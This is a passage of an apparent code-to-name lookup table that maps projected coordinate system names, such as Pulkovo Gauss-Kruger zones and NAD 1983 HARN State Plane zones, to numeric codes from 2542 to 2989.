'Pulkovo_1942_3_Degree_GK_Zone_26': 2542, 'Pulkovo_1942_3_Degree_GK_Zone_27': 2543, 'Pulkovo_1942_3_Degree_GK_Zone_28': 2544, 'Pulkovo_1942_3_Degree_GK_Zone_29': 2545, 'Pulkovo_1942_3_Degree_GK_Zone_30': 2546, 'Pulkovo_1942_3_Degree_GK_Zone_31': 2547, 'Pulkovo_1942_3_Degree_GK_Zone_32': 2548, 'Pulkovo_1942_3_Degree_GK_Zone_33': 2549, 'Samboja_UTM_Zone_50S': 2550, 'Pulkovo_1942_3_Degree_GK_Zone_34': 2551, 'Pulkovo_1942_3_Degree_GK_Zone_35': 2552, 'Pulkovo_1942_3_Degree_GK_Zone_36': 2553, 'Pulkovo_1942_3_Degree_GK_Zone_37': 2554, 'Pulkovo_1942_3_Degree_GK_Zone_38': 2555, 'Pulkovo_1942_3_Degree_GK_Zone_39': 2556, 'Pulkovo_1942_3_Degree_GK_Zone_40': 2557, 'Pulkovo_1942_3_Degree_GK_Zone_41': 2558, 'Pulkovo_1942_3_Degree_GK_Zone_42': 2559, 'Pulkovo_1942_3_Degree_GK_Zone_43': 2560, 'Pulkovo_1942_3_Degree_GK_Zone_44': 2561, 'Pulkovo_1942_3_Degree_GK_Zone_45': 2562, 'Pulkovo_1942_3_Degree_GK_Zone_46': 2563, 'Pulkovo_1942_3_Degree_GK_Zone_47': 2564, 'Pulkovo_1942_3_Degree_GK_Zone_48': 2565, 'Pulkovo_1942_3_Degree_GK_Zone_49': 2566, 'Pulkovo_1942_3_Degree_GK_Zone_50': 2567, 'Pulkovo_1942_3_Degree_GK_Zone_51': 2568, 'Pulkovo_1942_3_Degree_GK_Zone_52': 2569, 'Pulkovo_1942_3_Degree_GK_Zone_53': 2570, 'Pulkovo_1942_3_Degree_GK_Zone_54': 2571, 'Pulkovo_1942_3_Degree_GK_Zone_55': 2572, 'Pulkovo_1942_3_Degree_GK_Zone_56': 2573, 'Pulkovo_1942_3_Degree_GK_Zone_57': 2574, 'Pulkovo_1942_3_Degree_GK_Zone_58': 2575, 'Pulkovo_1942_3_Degree_GK_Zone_59': 2576, 'Pulkovo_1942_3_Degree_GK_Zone_60': 2577, 'Pulkovo_1942_3_Degree_GK_Zone_61': 2578, 'Pulkovo_1942_3_Degree_GK_Zone_62': 2579, 'Pulkovo_1942_3_Degree_GK_Zone_63': 2580, 'Pulkovo_1942_3_Degree_GK_Zone_64': 2581, 'Pulkovo_1942_3_Degree_GK_CM_21E': 2582, 'Pulkovo_1942_3_Degree_GK_CM_24E': 2583, 'Pulkovo_1942_3_Degree_GK_CM_27E': 2584, 'Pulkovo_1942_3_Degree_GK_CM_30E': 2585, 'Pulkovo_1942_3_Degree_GK_CM_33E': 2586, 'Pulkovo_1942_3_Degree_GK_CM_36E': 2587, 'Pulkovo_1942_3_Degree_GK_CM_39E': 2588, 'Pulkovo_1942_3_Degree_GK_CM_42E': 2589, 'Pulkovo_1942_3_Degree_GK_CM_45E': 2590, 'Pulkovo_1942_3_Degree_GK_CM_48E': 2591, 'Pulkovo_1942_3_Degree_GK_CM_51E': 2592, 'Pulkovo_1942_3_Degree_GK_CM_54E': 2593, 'Pulkovo_1942_3_Degree_GK_CM_57E': 2594, 'Pulkovo_1942_3_Degree_GK_CM_60E': 2595, 'Pulkovo_1942_3_Degree_GK_CM_63E': 2596, 'Pulkovo_1942_3_Degree_GK_CM_66E': 2597, 'Pulkovo_1942_3_Degree_GK_CM_69E': 2598, 'Pulkovo_1942_3_Degree_GK_CM_72E': 2599, 'Lietuvos_Koordinaciu_Sistema': 2600, 'Pulkovo_1942_3_Degree_GK_CM_75E': 2601, 'Pulkovo_1942_3_Degree_GK_CM_78E': 2602, 'Pulkovo_1942_3_Degree_GK_CM_81E': 2603, 'Pulkovo_1942_3_Degree_GK_CM_84E': 2604, 'Pulkovo_1942_3_Degree_GK_CM_87E': 2605, 'Pulkovo_1942_3_Degree_GK_CM_90E': 2606, 'Pulkovo_1942_3_Degree_GK_CM_93E': 2607, 'Pulkovo_1942_3_Degree_GK_CM_96E': 2608, 'Pulkovo_1942_3_Degree_GK_CM_99E': 2609, 'Pulkovo_1942_3_Degree_GK_CM_102E': 2610, 'Pulkovo_1942_3_Degree_GK_CM_105E': 2611, 'Pulkovo_1942_3_Degree_GK_CM_108E': 2612, 'Pulkovo_1942_3_Degree_GK_CM_111E': 2613, 'Pulkovo_1942_3_Degree_GK_CM_114E': 2614, 'Pulkovo_1942_3_Degree_GK_CM_117E': 2615, 'Pulkovo_1942_3_Degree_GK_CM_120E': 2616, 'Pulkovo_1942_3_Degree_GK_CM_123E': 2617, 'Pulkovo_1942_3_Degree_GK_CM_126E': 2618, 'Pulkovo_1942_3_Degree_GK_CM_129E': 2619, 'Pulkovo_1942_3_Degree_GK_CM_132E': 2620, 'Pulkovo_1942_3_Degree_GK_CM_135E': 2621, 'Pulkovo_1942_3_Degree_GK_CM_138E': 2622, 'Pulkovo_1942_3_Degree_GK_CM_141E': 2623, 'Pulkovo_1942_3_Degree_GK_CM_144E': 2624, 'Pulkovo_1942_3_Degree_GK_CM_147E': 2625, 'Pulkovo_1942_3_Degree_GK_CM_150E': 2626, 'Pulkovo_1942_3_Degree_GK_CM_153E': 2627, 'Pulkovo_1942_3_Degree_GK_CM_156E': 2628, 'Pulkovo_1942_3_Degree_GK_CM_159E': 2629, 'Pulkovo_1942_3_Degree_GK_CM_162E': 2630, 'Pulkovo_1942_3_Degree_GK_CM_165E': 2631, 'Pulkovo_1942_3_Degree_GK_CM_168E': 2632, 'Pulkovo_1942_3_Degree_GK_CM_171E': 2633, 'Pulkovo_1942_3_Degree_GK_CM_174E': 2634, 'Pulkovo_1942_3_Degree_GK_CM_177E': 2635, 'Pulkovo_1942_3_Degree_GK_CM_180E': 2636, 'Pulkovo_1942_3_Degree_GK_CM_177W': 2637, 'Pulkovo_1942_3_Degree_GK_CM_174W': 2638, 'Pulkovo_1942_3_Degree_GK_CM_171W': 2639, 'Pulkovo_1942_3_Degree_GK_CM_168W': 2640, 'Pulkovo_1995_3_Degree_GK_Zone_7': 2641, 'Pulkovo_1995_3_Degree_GK_Zone_8': 2642, 'Pulkovo_1995_3_Degree_GK_Zone_9': 2643, 'Pulkovo_1995_3_Degree_GK_Zone_10': 2644, 'Pulkovo_1995_3_Degree_GK_Zone_11': 2645, 'Pulkovo_1995_3_Degree_GK_Zone_12': 2646, 'Pulkovo_1995_3_Degree_GK_Zone_13': 2647, 'Pulkovo_1995_3_Degree_GK_Zone_14': 2648, 'Pulkovo_1995_3_Degree_GK_Zone_15': 2649, 'Pulkovo_1995_3_Degree_GK_Zone_16': 2650, 'Pulkovo_1995_3_Degree_GK_Zone_17': 2651, 'Pulkovo_1995_3_Degree_GK_Zone_18': 2652, 'Pulkovo_1995_3_Degree_GK_Zone_19': 2653, 'Pulkovo_1995_3_Degree_GK_Zone_20': 2654, 'Pulkovo_1995_3_Degree_GK_Zone_21': 2655, 'Pulkovo_1995_3_Degree_GK_Zone_22': 2656, 'Pulkovo_1995_3_Degree_GK_Zone_23': 2657, 'Pulkovo_1995_3_Degree_GK_Zone_24': 2658, 'Pulkovo_1995_3_Degree_GK_Zone_25': 2659, 'Pulkovo_1995_3_Degree_GK_Zone_26': 2660, 'Pulkovo_1995_3_Degree_GK_Zone_27': 2661, 'Pulkovo_1995_3_Degree_GK_Zone_28': 2662, 'Pulkovo_1995_3_Degree_GK_Zone_29': 2663, 'Pulkovo_1995_3_Degree_GK_Zone_30': 2664, 'Pulkovo_1995_3_Degree_GK_Zone_31': 2665, 'Pulkovo_1995_3_Degree_GK_Zone_32': 2666, 'Pulkovo_1995_3_Degree_GK_Zone_33': 2667, 'Pulkovo_1995_3_Degree_GK_Zone_34': 2668, 'Pulkovo_1995_3_Degree_GK_Zone_35': 2669, 'Pulkovo_1995_3_Degree_GK_Zone_36': 2670, 'Pulkovo_1995_3_Degree_GK_Zone_37': 2671, 'Pulkovo_1995_3_Degree_GK_Zone_38': 2672, 'Pulkovo_1995_3_Degree_GK_Zone_39': 2673, 'Pulkovo_1995_3_Degree_GK_Zone_40': 2674, 'Pulkovo_1995_3_Degree_GK_Zone_41': 2675, 'Pulkovo_1995_3_Degree_GK_Zone_42': 2676, 'Pulkovo_1995_3_Degree_GK_Zone_43': 2677, 'Pulkovo_1995_3_Degree_GK_Zone_44': 2678, 'Pulkovo_1995_3_Degree_GK_Zone_45': 2679, 'Pulkovo_1995_3_Degree_GK_Zone_46': 2680, 'Pulkovo_1995_3_Degree_GK_Zone_47': 2681, 'Pulkovo_1995_3_Degree_GK_Zone_48': 2682, 'Pulkovo_1995_3_Degree_GK_Zone_49': 2683, 'Pulkovo_1995_3_Degree_GK_Zone_50': 2684, 'Pulkovo_1995_3_Degree_GK_Zone_51': 2685, 'Pulkovo_1995_3_Degree_GK_Zone_52': 2686, 'Pulkovo_1995_3_Degree_GK_Zone_53': 2687, 'Pulkovo_1995_3_Degree_GK_Zone_54': 2688, 'Pulkovo_1995_3_Degree_GK_Zone_55': 2689, 'Pulkovo_1995_3_Degree_GK_Zone_56': 2690, 'Pulkovo_1995_3_Degree_GK_Zone_57': 2691, 'Pulkovo_1995_3_Degree_GK_Zone_58': 2692, 'Pulkovo_1995_3_Degree_GK_Zone_59': 2693, 'Pulkovo_1995_3_Degree_GK_Zone_60': 2694, 'Pulkovo_1995_3_Degree_GK_Zone_61': 2695, 'Pulkovo_1995_3_Degree_GK_Zone_62': 2696, 'Pulkovo_1995_3_Degree_GK_Zone_63': 2697, 'Pulkovo_1995_3_Degree_GK_Zone_64': 2698, 'Pulkovo_1995_3_Degree_GK_CM_21E': 2699, 'Pulkovo_1995_3_Degree_GK_CM_24E': 2700, 'Pulkovo_1995_3_Degree_GK_CM_27E': 2701, 'Pulkovo_1995_3_Degree_GK_CM_30E': 2702, 'Pulkovo_1995_3_Degree_GK_CM_33E': 2703, 'Pulkovo_1995_3_Degree_GK_CM_36E': 2704, 'Pulkovo_1995_3_Degree_GK_CM_39E': 2705, 'Pulkovo_1995_3_Degree_GK_CM_42E': 2706, 'Pulkovo_1995_3_Degree_GK_CM_45E': 2707, 'Pulkovo_1995_3_Degree_GK_CM_48E': 2708, 'Pulkovo_1995_3_Degree_GK_CM_51E': 2709, 'Pulkovo_1995_3_Degree_GK_CM_54E': 2710, 'Pulkovo_1995_3_Degree_GK_CM_57E': 2711, 'Pulkovo_1995_3_Degree_GK_CM_60E': 2712, 'Pulkovo_1995_3_Degree_GK_CM_63E': 2713, 'Pulkovo_1995_3_Degree_GK_CM_66E': 2714, 'Pulkovo_1995_3_Degree_GK_CM_69E': 2715, 'Pulkovo_1995_3_Degree_GK_CM_72E': 2716, 'Pulkovo_1995_3_Degree_GK_CM_75E': 2717, 'Pulkovo_1995_3_Degree_GK_CM_78E': 2718, 'Pulkovo_1995_3_Degree_GK_CM_81E': 2719, 'Pulkovo_1995_3_Degree_GK_CM_84E': 2720, 'Pulkovo_1995_3_Degree_GK_CM_87E': 2721, 'Pulkovo_1995_3_Degree_GK_CM_90E': 2722, 'Pulkovo_1995_3_Degree_GK_CM_93E': 2723, 'Pulkovo_1995_3_Degree_GK_CM_96E': 2724, 'Pulkovo_1995_3_Degree_GK_CM_99E': 2725, 'Pulkovo_1995_3_Degree_GK_CM_102E': 2726, 'Pulkovo_1995_3_Degree_GK_CM_105E': 2727, 'Pulkovo_1995_3_Degree_GK_CM_108E': 2728, 'Pulkovo_1995_3_Degree_GK_CM_111E': 2729, 'Pulkovo_1995_3_Degree_GK_CM_114E': 2730, 'Pulkovo_1995_3_Degree_GK_CM_117E': 2731, 'Pulkovo_1995_3_Degree_GK_CM_120E': 2732, 'Pulkovo_1995_3_Degree_GK_CM_123E': 2733, 'Pulkovo_1995_3_Degree_GK_CM_126E': 2734, 'Pulkovo_1995_3_Degree_GK_CM_129E': 2735, 'Tete_UTM_Zone_36S': 2736, 'Tete_UTM_Zone_37S': 2737, 'Pulkovo_1995_3_Degree_GK_CM_132E': 2738, 'Pulkovo_1995_3_Degree_GK_CM_135E': 2739, 'Pulkovo_1995_3_Degree_GK_CM_138E': 2740, 'Pulkovo_1995_3_Degree_GK_CM_141E': 2741, 'Pulkovo_1995_3_Degree_GK_CM_144E': 2742, 'Pulkovo_1995_3_Degree_GK_CM_147E': 2743, 'Pulkovo_1995_3_Degree_GK_CM_150E': 2744, 'Pulkovo_1995_3_Degree_GK_CM_153E': 2745, 'Pulkovo_1995_3_Degree_GK_CM_156E': 2746, 'Pulkovo_1995_3_Degree_GK_CM_159E': 2747, 'Pulkovo_1995_3_Degree_GK_CM_162E': 2748, 'Pulkovo_1995_3_Degree_GK_CM_165E': 2749, 'Pulkovo_1995_3_Degree_GK_CM_168E': 2750, 'Pulkovo_1995_3_Degree_GK_CM_171E': 2751, 'Pulkovo_1995_3_Degree_GK_CM_174E': 2752, 'Pulkovo_1995_3_Degree_GK_CM_177E': 2753, 'Pulkovo_1995_3_Degree_GK_CM_180E': 2754, 'Pulkovo_1995_3_Degree_GK_CM_177W': 2755, 'Pulkovo_1995_3_Degree_GK_CM_174W': 2756, 'Pulkovo_1995_3_Degree_GK_CM_171W': 2757, 'Pulkovo_1995_3_Degree_GK_CM_168W': 2758, 'NAD_1983_HARN_StatePlane_Alabama_East_FIPS_0101': 2759, 'NAD_1983_HARN_StatePlane_Alabama_West_FIPS_0102': 2760, 'NAD_1983_HARN_StatePlane_Arizona_East_FIPS_0201': 2761, 'NAD_1983_HARN_StatePlane_Arizona_Central_FIPS_0202': 2762, 'NAD_1983_HARN_StatePlane_Arizona_West_FIPS_0203': 2763, 'NAD_1983_HARN_StatePlane_Arkansas_North_FIPS_0301': 2764, 'NAD_1983_HARN_StatePlane_Arkansas_South_FIPS_0302': 2765, 'NAD_1983_HARN_StatePlane_California_I_FIPS_0401': 2766, 'NAD_1983_HARN_StatePlane_California_II_FIPS_0402': 2767, 'NAD_1983_HARN_StatePlane_California_III_FIPS_0403': 2768, 'NAD_1983_HARN_StatePlane_California_IV_FIPS_0404': 2769, 'NAD_1983_HARN_StatePlane_California_V_FIPS_0405': 2770, 'NAD_1983_HARN_StatePlane_California_VI_FIPS_0406': 2771, 'NAD_1983_HARN_StatePlane_Colorado_North_FIPS_0501': 2772, 'NAD_1983_HARN_StatePlane_Colorado_Central_FIPS_0502': 2773, 'NAD_1983_HARN_StatePlane_Colorado_South_FIPS_0503': 2774, 'NAD_1983_HARN_StatePlane_Connecticut_FIPS_0600': 2775, 'NAD_1983_HARN_StatePlane_Delaware_FIPS_0700': 2776, 'NAD_1983_HARN_StatePlane_Florida_East_FIPS_0901': 2777, 'NAD_1983_HARN_StatePlane_Florida_West_FIPS_0902': 2778, 'NAD_1983_HARN_StatePlane_Florida_North_FIPS_0903': 2779, 'NAD_1983_HARN_StatePlane_Georgia_East_FIPS_1001': 2780, 'NAD_1983_HARN_StatePlane_Georgia_West_FIPS_1002': 2781, 'NAD_1983_HARN_StatePlane_Hawaii_1_FIPS_5101': 2782, 'NAD_1983_HARN_StatePlane_Hawaii_2_FIPS_5102': 2783, 'NAD_1983_HARN_StatePlane_Hawaii_3_FIPS_5103': 2784, 'NAD_1983_HARN_StatePlane_Hawaii_4_FIPS_5104': 2785, 'NAD_1983_HARN_StatePlane_Hawaii_5_FIPS_5105': 2786, 'NAD_1983_HARN_StatePlane_Idaho_East_FIPS_1101': 2787, 'NAD_1983_HARN_StatePlane_Idaho_Central_FIPS_1102': 2788, 'NAD_1983_HARN_StatePlane_Idaho_West_FIPS_1103': 2789, 'NAD_1983_HARN_StatePlane_Illinois_East_FIPS_1201': 2790, 'NAD_1983_HARN_StatePlane_Illinois_West_FIPS_1202': 2791, 'NAD_1983_HARN_StatePlane_Indiana_East_FIPS_1301': 2792, 'NAD_1983_HARN_StatePlane_Indiana_West_FIPS_1302': 2793, 'NAD_1983_HARN_StatePlane_Iowa_North_FIPS_1401': 2794, 'NAD_1983_HARN_StatePlane_Iowa_South_FIPS_1402': 2795, 'NAD_1983_HARN_StatePlane_Kansas_North_FIPS_1501': 2796, 'NAD_1983_HARN_StatePlane_Kansas_South_FIPS_1502': 2797, 'NAD_1983_HARN_StatePlane_Kentucky_North_FIPS_1601': 2798, 'NAD_1983_HARN_StatePlane_Kentucky_South_FIPS_1602': 2799, 'NAD_1983_HARN_StatePlane_Louisiana_North_FIPS_1701': 2800, 'NAD_1983_HARN_StatePlane_Louisiana_South_FIPS_1702': 2801, 'NAD_1983_HARN_StatePlane_Maine_East_FIPS_1801': 2802, 'NAD_1983_HARN_StatePlane_Maine_West_FIPS_1802': 2803, 'NAD_1983_HARN_StatePlane_Maryland_FIPS_1900': 2804, 'NAD_1983_HARN_StatePlane_Massachusetts_Mainland_FIPS_2001': 2805, 'NAD_1983_HARN_StatePlane_Massachusetts_Island_FIPS_2002': 2806, 'NAD_1983_HARN_StatePlane_Michigan_North_FIPS_2111': 2807, 'NAD_1983_HARN_StatePlane_Michigan_Central_FIPS_2112': 2808, 'NAD_1983_HARN_StatePlane_Michigan_South_FIPS_2113': 2809, 'NAD_1983_HARN_StatePlane_Minnesota_North_FIPS_2201': 2810, 'NAD_1983_HARN_StatePlane_Minnesota_Central_FIPS_2202': 2811, 'NAD_1983_HARN_StatePlane_Minnesota_South_FIPS_2203': 2812, 'NAD_1983_HARN_StatePlane_Mississippi_East_FIPS_2301': 2813, 'NAD_1983_HARN_StatePlane_Mississippi_West_FIPS_2302': 2814, 'NAD_1983_HARN_StatePlane_Missouri_East_FIPS_2401': 2815, 'NAD_1983_HARN_StatePlane_Missouri_Central_FIPS_2402': 2816, 'NAD_1983_HARN_StatePlane_Missouri_West_FIPS_2403': 2817, 'NAD_1983_HARN_StatePlane_Montana_FIPS_2500': 2818, 'NAD_1983_HARN_StatePlane_Nebraska_FIPS_2600': 2819, 'NAD_1983_HARN_StatePlane_Nevada_East_FIPS_2701': 2820, 'NAD_1983_HARN_StatePlane_Nevada_Central_FIPS_2702': 2821, 'NAD_1983_HARN_StatePlane_Nevada_West_FIPS_2703': 2822, 'NAD_1983_HARN_StatePlane_New_Hampshire_FIPS_2800': 2823, 'NAD_1983_HARN_StatePlane_New_Jersey_FIPS_2900': 2824, 'NAD_1983_HARN_StatePlane_New_Mexico_East_FIPS_3001': 2825, 'NAD_1983_HARN_StatePlane_New_Mexico_Central_FIPS_3002': 2826, 'NAD_1983_HARN_StatePlane_New_Mexico_West_FIPS_3003': 2827, 'NAD_1983_HARN_StatePlane_New_York_East_FIPS_3101': 2828, 'NAD_1983_HARN_StatePlane_New_York_Central_FIPS_3102': 2829, 'NAD_1983_HARN_StatePlane_New_York_West_FIPS_3103': 2830, 'NAD_1983_HARN_StatePlane_New_York_Long_Island_FIPS_3104': 2831, 'NAD_1983_HARN_StatePlane_North_Dakota_North_FIPS_3301': 2832, 'NAD_1983_HARN_StatePlane_North_Dakota_South_FIPS_3302': 2833, 'NAD_1983_HARN_StatePlane_Ohio_North_FIPS_3401': 2834, 'NAD_1983_HARN_StatePlane_Ohio_South_FIPS_3402': 2835, 'NAD_1983_HARN_StatePlane_Oklahoma_North_FIPS_3501': 2836, 'NAD_1983_HARN_StatePlane_Oklahoma_South_FIPS_3502': 2837, 'NAD_1983_HARN_StatePlane_Oregon_North_FIPS_3601': 2838, 'NAD_1983_HARN_StatePlane_Oregon_South_FIPS_3602': 2839, 'NAD_1983_HARN_StatePlane_Rhode_Island_FIPS_3800': 2840, 'NAD_1983_HARN_StatePlane_South_Dakota_North_FIPS_4001': 2841, 'NAD_1983_HARN_StatePlane_South_Dakota_South_FIPS_4002': 2842, 'NAD_1983_HARN_StatePlane_Tennessee_FIPS_4100': 2843, 'NAD_1983_HARN_StatePlane_Texas_North_FIPS_4201': 2844, 'NAD_1983_HARN_StatePlane_Texas_North_Central_FIPS_4202': 2845, 'NAD_1983_HARN_StatePlane_Texas_Central_FIPS_4203': 2846, 'NAD_1983_HARN_StatePlane_Texas_South_Central_FIPS_4204': 2847, 'NAD_1983_HARN_StatePlane_Texas_South_FIPS_4205': 2848, 'NAD_1983_HARN_StatePlane_Utah_North_FIPS_4301': 2849, 'NAD_1983_HARN_StatePlane_Utah_Central_FIPS_4302': 2850, 'NAD_1983_HARN_StatePlane_Utah_South_FIPS_4303': 2851, 'NAD_1983_HARN_StatePlane_Vermont_FIPS_4400': 2852, 'NAD_1983_HARN_StatePlane_Virginia_North_FIPS_4501': 2853, 'NAD_1983_HARN_StatePlane_Virginia_South_FIPS_4502': 2854, 'NAD_1983_HARN_StatePlane_Washington_North_FIPS_4601': 2855, 'NAD_1983_HARN_StatePlane_Washington_South_FIPS_4602': 2856, 'NAD_1983_HARN_StatePlane_West_Virginia_North_FIPS_4701': 2857, 'NAD_1983_HARN_StatePlane_West_Virginia_South_FIPS_4702': 2858, 'NAD_1983_HARN_StatePlane_Wisconsin_North_FIPS_4801': 2859, 'NAD_1983_HARN_StatePlane_Wisconsin_Central_FIPS_4802': 2860, 'NAD_1983_HARN_StatePlane_Wisconsin_South_FIPS_4803': 2861, 'NAD_1983_HARN_StatePlane_Wyoming_East_FIPS_4901': 2862, 'NAD_1983_HARN_StatePlane_Wyoming_East_Central_FIPS_4902': 2863, 'NAD_1983_HARN_StatePlane_Wyoming_West_Central_FIPS_4903': 2864, 'NAD_1983_HARN_StatePlane_Wyoming_West_FIPS_4904': 2865, 'NAD_1983_HARN_StatePlane_Puerto_Rico_Virgin_Islands_FIPS_5200': 2866, 'NAD_1983_HARN_StatePlane_Arizona_East_FIPS_0201_Feet_Intl': 2867, 'NAD_1983_HARN_StatePlane_Arizona_Central_FIPS_0202_Feet_Intl': 2868, 'NAD_1983_HARN_StatePlane_Arizona_West_FIPS_0203_Feet_Intl': 2869, 'NAD_1983_HARN_StatePlane_California_I_FIPS_0401_Feet': 2870, 'NAD_1983_HARN_StatePlane_California_II_FIPS_0402_Feet': 2871, 'NAD_1983_HARN_StatePlane_California_III_FIPS_0403_Feet': 2872, 'NAD_1983_HARN_StatePlane_California_IV_FIPS_0404_Feet': 2873, 'NAD_1983_HARN_StatePlane_California_V_FIPS_0405_Feet': 2874, 'NAD_1983_HARN_StatePlane_California_VI_FIPS_0406_Feet': 2875, 'NAD_1983_HARN_StatePlane_Colorado_North_FIPS_0501_Feet': 2876, 'NAD_1983_HARN_StatePlane_Colorado_Central_FIPS_0502_Feet': 2877, 'NAD_1983_HARN_StatePlane_Colorado_South_FIPS_0503_Feet': 2878, 'NAD_1983_HARN_StatePlane_Connecticut_FIPS_0600_Feet': 2879, 'NAD_1983_HARN_StatePlane_Delaware_FIPS_0700_Feet': 2880, 'NAD_1983_HARN_StatePlane_Florida_East_FIPS_0901_Feet': 2881, 'NAD_1983_HARN_StatePlane_Florida_West_FIPS_0902_Feet': 2882, 'NAD_1983_HARN_StatePlane_Florida_North_FIPS_0903_Feet': 2883, 'NAD_1983_HARN_StatePlane_Georgia_East_FIPS_1001_Feet': 2884, 'NAD_1983_HARN_StatePlane_Georgia_West_FIPS_1002_Feet': 2885, 'NAD_1983_HARN_StatePlane_Idaho_East_FIPS_1101_Feet': 2886, 'NAD_1983_HARN_StatePlane_Idaho_Central_FIPS_1102_Feet': 2887, 'NAD_1983_HARN_StatePlane_Idaho_West_FIPS_1103_Feet': 2888, 'NAD_1983_HARN_StatePlane_Kentucky_North_FIPS_1601_Feet': 2891, 'NAD_1983_HARN_StatePlane_Kentucky_South_FIPS_1602_Feet': 2892, 'NAD_1983_HARN_StatePlane_Maryland_FIPS_1900_Feet': 2893, 'NAD_1983_HARN_StatePlane_Massachusetts_Mainland_FIPS_2001_Feet': 2894, 'NAD_1983_HARN_StatePlane_Massachusetts_Island_FIPS_2002_Feet': 2895, 'NAD_1983_HARN_StatePlane_Michigan_North_FIPS_2111_Feet_Intl': 2896, 'NAD_1983_HARN_StatePlane_Michigan_Central_FIPS_2112_Feet_Intl': 2897, 'NAD_1983_HARN_StatePlane_Michigan_South_FIPS_2113_Feet_Intl': 2898, 'NAD_1983_HARN_StatePlane_Mississippi_East_FIPS_2301_Feet': 2899, 'NAD_1983_HARN_StatePlane_Mississippi_West_FIPS_2302_Feet': 2900, 'NAD_1983_HARN_StatePlane_Montana_FIPS_2500_Feet_Intl': 2901, 'NAD_1983_HARN_StatePlane_New_Mexico_East_FIPS_3001_Feet': 2902, 'NAD_1983_HARN_StatePlane_New_Mexico_Central_FIPS_3002_Feet': 2903, 'NAD_1983_HARN_StatePlane_New_Mexico_West_FIPS_3003_Feet': 2904, 'NAD_1983_HARN_StatePlane_New_York_East_FIPS_3101_Feet': 2905, 'NAD_1983_HARN_StatePlane_New_York_Central_FIPS_3102_Feet': 2906, 'NAD_1983_HARN_StatePlane_New_York_West_FIPS_3103_Feet': 2907, 'NAD_1983_HARN_StatePlane_New_York_Long_Island_FIPS_3104_Feet': 2908, 'NAD_1983_HARN_StatePlane_North_Dakota_North_FIPS_3301_Feet_Intl': 2909, 'NAD_1983_HARN_StatePlane_North_Dakota_South_FIPS_3302_Feet_Intl': 2910, 'NAD_1983_HARN_StatePlane_Oklahoma_North_FIPS_3501_Feet': 2911, 'NAD_1983_HARN_StatePlane_Oklahoma_South_FIPS_3502_Feet': 2912, 'NAD_1983_HARN_StatePlane_Oregon_North_FIPS_3601_Feet_Intl': 2913, 'NAD_1983_HARN_StatePlane_Oregon_South_FIPS_3602_Feet_Intl': 2914, 'NAD_1983_HARN_StatePlane_Tennessee_FIPS_4100_Feet': 2915, 'NAD_1983_HARN_StatePlane_Texas_North_FIPS_4201_Feet': 2916, 'NAD_1983_HARN_StatePlane_Texas_North_Central_FIPS_4202_Feet': 2917, 'NAD_1983_HARN_StatePlane_Texas_Central_FIPS_4203_Feet': 2918, 'NAD_1983_HARN_StatePlane_Texas_South_Central_FIPS_4204_Feet': 2919, 'NAD_1983_HARN_StatePlane_Texas_South_FIPS_4205_Feet': 2920, 'NAD_1983_HARN_StatePlane_Utah_North_FIPS_4301_Feet_Intl': 2921, 'NAD_1983_HARN_StatePlane_Utah_Central_FIPS_4302_Feet_Intl': 2922, 'NAD_1983_HARN_StatePlane_Utah_South_FIPS_4303_Feet_Intl': 2923, 'NAD_1983_HARN_StatePlane_Virginia_North_FIPS_4501_Feet': 2924, 'NAD_1983_HARN_StatePlane_Virginia_South_FIPS_4502_Feet': 2925, 'NAD_1983_HARN_StatePlane_Washington_North_FIPS_4601_Feet': 2926, 'NAD_1983_HARN_StatePlane_Washington_South_FIPS_4602_Feet': 2927, 'NAD_1983_HARN_StatePlane_Wisconsin_North_FIPS_4801_Feet': 2928, 'NAD_1983_HARN_StatePlane_Wisconsin_Central_FIPS_4802_Feet': 2929, 'NAD_1983_HARN_StatePlane_Wisconsin_South_FIPS_4803_Feet': 2930, 'Beduaram_TM_13_NE': 2931, 'QND_1995_Qatar_National_Grid': 2932, 'Gunung_Segara_UTM_Zone_50S': 2933, 'Pulkovo_1942_CS63_Zone_A1': 2935, 'Pulkovo_1942_CS63_Zone_A2': 2936, 'Pulkovo_1942_CS63_Zone_A3': 2937, 'Pulkovo_1942_CS63_Zone_A4': 2938, 'Pulkovo_1942_CS63_Zone_K2': 2939, 'Pulkovo_1942_CS63_Zone_K3': 2940, 'Pulkovo_1942_CS63_Zone_K4': 2941, 'Porto_Santo_1936_UTM_Zone_28N': 2942, 'Selvagem_Grande_1938_UTM_Zone_28N': 2943, 'NAD_1983_CSRS_MTM_2_SCoPQ': 2944, 'NAD_1983_CSRS_MTM_3': 2945, 'NAD_1983_CSRS_MTM_4': 2946, 'NAD_1983_CSRS_MTM_5': 2947, 'NAD_1983_CSRS_MTM_6': 2948, 'NAD_1983_CSRS_MTM_7': 2949, 'NAD_1983_CSRS_MTM_8': 2950, 'NAD_1983_CSRS_MTM_9': 2951, 'NAD_1983_CSRS_MTM_10': 2952, 'NAD_1983_CSRS_New_Brunswick_Stereographic': 2953, 'NAD_1983_CSRS_Prince_Edward_Island': 2954, 'NAD_1983_CSRS_UTM_Zone_11N': 2955, 'NAD_1983_CSRS_UTM_Zone_12N': 2956, 'NAD_1983_CSRS_UTM_Zone_13N': 2957, 'NAD_1983_CSRS_UTM_Zone_17N': 2958, 'NAD_1983_CSRS_UTM_Zone_18N': 2959, 'NAD_1983_CSRS_UTM_Zone_19N': 2960, 'NAD_1983_CSRS_UTM_Zone_20N': 2961, 'NAD_1983_CSRS_UTM_Zone_21N': 2962, 'NAD_1927_Alaska_Albers_Feet': 2964, 'NAD_1983_StatePlane_Indiana_East_FIPS_1301_Feet': 2965, 'NAD_1983_StatePlane_Indiana_West_FIPS_1302_Feet': 2966, 'NAD_1983_HARN_StatePlane_Indiana_East_FIPS_1301_Feet': 2967, 'NAD_1983_HARN_StatePlane_Indiana_West_FIPS_1302_Feet': 2968, 'Fort_Marigot_UTM_20N': 2969, 'Sainte_Anne_UTM_20N': 2970, 'CSG_1967_UTM_22N': 2971, 'RGFG_1995_UTM_22N': 2972, 'Fort_Desaix_UTM_20N': 2973, 'RGR_1992_UTM_40S': 2975, 'Tahiti_1952_UTM_6S': 2976, 'Tahaa_1954_UTM_5S': 2977, 'IGN72_Nuku_Hiva_UTM_7S': 2978, 'K0_1949_UTM_42S': 2979, 'Combani_1950_UTM_38S': 2980, 'IGN56_Lifou_UTM_58S': 2981, 'IGN72_Grande_Terre_UTM_58S': 2982, 'RGNC_1991_Lambert_New_Caledonia': 2984, 'Petrels_1972_Terre_Adelie_Polar_Stereographic': 2985, 'Perroud_1950_Terre_Adelie_Polar_Stereographic': 2986, 'Saint_Pierre_et_Miquelon_1950_UTM_21N': 2987, 'MOP78_UTM_1S': 2988, 'RRAF_1991_UTM_20N': 2989, 